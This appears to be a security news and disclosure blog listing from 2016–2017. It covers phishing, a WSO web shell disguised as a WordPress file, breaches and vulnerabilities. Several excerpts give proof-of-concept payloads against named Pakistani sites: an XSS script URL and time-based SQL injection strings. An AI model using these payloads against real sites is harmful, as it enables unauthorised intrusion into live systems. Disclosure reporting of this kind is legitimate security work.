January 25, 2017
Government officials warned that the emails being sent from Mumbai, (India) and USA addresses could hack all the information from the device.
January 24, 2017
CK uses a well known shell as a backdoor which is known as the WSO shell. It stores the backdoor in a file called wp-ajax.php which is made to look like a legitimate WordPress core file.It is affecting wordpress websites all around the world and specially in Pakistan on industrial scale.
January 22, 2017
Yahoo! hasn’t had the best year: failing to disclose that hundreds of millions of accounts were leaked years ago just as your organization experiences another hack isn’t the most ideal situation. Between the countless hacks […]
January 20, 2017
Cybersecurity is the fastest growing tech sector. While all other sectors are driven by reducing Inefficiencies and increasing productivity, cybersecurity spending is driven by cybercrime. The unprecedented cybercriminal activity we are witnessing is initiating so much cyber spending, it’s become nearly impossible for the analysts to accurately track.
January 19, 2017
website : expopakistan.gov.pk Description Expo Pakistan 2015 Home. Vulnerable URL: http://www.expopakistan.gov.pk/mission-admin/login.php?err=<script>ale rt(‘OPENBUGBOUNTY’)</script> Vulnerability type: XSS Vulnerability status: Publicly disclosed Alexa Rank 2132001
January 19, 2017
Total number of users affected is estimated at 9 million, a critical vulnerability discovered (CVE-2016-10033), which allows to initiate a remote code execution without passing authentication.
July 26, 2016
Allama Iqbal Open University website : http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET) vuln type : sql injection submitted by : Waqas Haider Poc : Parameter: dt (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dt=1;WAITFOR DELAY '0:0:5'– […]
July 26, 2016
website : www.hu.edu.pk/oldwebsitehu/webtest/view_deg_prog.php?id=1 Vuln type : Sql Injection Submitted by : Waqas Haider POC : Vuln-Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Title: Generic […]
